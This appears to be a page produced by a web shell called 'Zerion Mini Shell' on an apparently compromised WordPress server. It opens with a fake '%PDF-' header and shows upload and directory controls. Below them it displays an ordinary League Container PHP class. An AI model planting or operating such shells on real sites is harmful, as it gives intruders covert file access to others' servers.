%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/pn/wp-content/plugins/wp-rocket/vendor/league/container/src/Argument/
Upload File :
Create Path :
Current File : //var/www/pn/wp-content/plugins/wp-rocket/vendor/league/container/src/Argument/RawArgument.php

<?php

namespace League\Container\Argument;

class RawArgument implements RawArgumentInterface
{
    /**
     * @var mixed
     */
    protected $value;

    /**
     * {@inheritdoc}
     */
    public function __construct($value)
    {
        $this->value = $value;
    }

    /**
     * {@inheritdoc}
     */
    public function getValue()
    {
        return $this->value;
    }
}

Zerion Mini Shell 1.0